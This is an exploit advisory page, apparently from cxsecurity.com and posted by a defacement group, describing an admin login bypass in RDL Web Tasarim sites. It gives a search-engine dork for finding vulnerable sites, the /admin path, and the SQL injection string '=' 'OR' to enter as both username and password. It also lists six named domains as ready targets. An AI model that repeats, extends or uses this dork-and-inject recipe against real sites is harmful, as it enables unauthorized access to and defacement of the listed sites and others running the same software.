RDL Web Tasarim Admin Page Bypass

2016.04.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : RDL Web Tasarim Admin Page Bypass # Exploit Author : Azerbaijan Defacers Group # Vendor Homepage : www.rdl.com.tr # Google Dork : intext:"RDL Web Tasarшm" # Date: 11 04 2016 # Tested On : Kali / Windows 7/8 # Contact: www.facebook.com/AzerbaijanDefacersGroup ###################### # # Search dork and select Target # Admin panel: /admin # Username : '=' 'OR' # Password : '=' 'OR' # # www.kent-insaat.com/admin # www.hanimagayapi.com/admin # www.diyarlifewebtasarim.com/admin # www.ozmenler1.com/admin # www.oguryapi.com/admin # www.cavusogluyapi.com.tr/admin ###################### # discovered by : Region 20 # Thanks To : S4RC4SM , Region20 , S3N4T0R , Dervish , P4TR!07 , CrowN , BlacKBlooD , MrLa3eL , RooT_DaRK , Thor , D4RT0N ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top